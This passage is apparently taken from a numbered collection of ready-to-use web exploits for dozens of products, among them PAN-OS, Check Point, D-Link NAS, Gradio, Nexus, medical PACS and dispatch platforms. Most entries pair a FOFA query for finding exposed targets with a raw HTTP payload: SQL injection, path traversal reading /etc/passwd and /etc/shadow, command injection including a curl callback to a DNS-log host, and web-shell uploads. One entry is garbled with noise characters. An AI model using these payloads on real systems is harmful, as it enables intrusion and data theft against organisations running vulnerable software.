User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the cached file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage navigation page file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip


157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--


http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1


159. 英飞达 PACS (medical image archiving and communication system) WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>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</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>


/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")


160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file; the <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>


http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--


http://x.x.x.x/opt/resources/kjuhitjgk.aspx

+ e$ o. W/ O5 E! E9 R163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
" Y/ i9 h' {+ y- U6 D1 \+ lFOFA: icon_hash="-795291075"
4 p! g7 I% }& i% Z7 rPOST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
) p- V1 n* C* \* P% VHost: x.x.x.x$ P* }$ x2 g  {' r, g1 [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.360 Q, i, W+ H; w+ g6 q3 K
Connection: close
8 a- s/ s/ g) {: ]( |$ B0 D! yContent-Length: 2930 H& o5 J7 }- P" |! h, g( Z
Accept: */*2 S( X' H' ?" A
Accept-Encoding: gzip, deflate
% X% C! R: t) k0 iAccept-Language: zh-CN,zh;q=0.9& l  S( J- t: d- W
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod) }9 V' a0 |& [5 b( x& p" _, x/ c5 p
) H0 I8 _% i$ `1 v# c
------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 e/ v# n: {, y2 L  [4 S4 VContent-Disposition: form-data; name="name"
* b0 f. V; _: x' H9 z; Z1 y# V3 q. ?; Y0 }+ U# G) b/ p
1.php4 T: G" c' T* [7 o( P5 @
------iiqvnofupvhdyrcoqyuujyetjvqgocod
( d6 g% R. G, R" ]% p* x. RContent-Disposition: form-data; name="upfile"; filename="1.php"
: k& r! x) @# R' RContent-Type: image/jpeg
. u% O8 |+ n5 b# N5 o9 E) t$ n4 X9 h/ m1 K  l3 u9 w* U
rvjhvbhwwuooyiioxega
$ p1 B* `3 O9 V( l------iiqvnofupvhdyrcoqyuujyetjvqgocod--
, x  V% l  \; S- Y9 n9 ?& C: ^9 r. n8 {* b4 O- Y

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml


171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT-高清车牌识别摄像机 (DT HD license plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
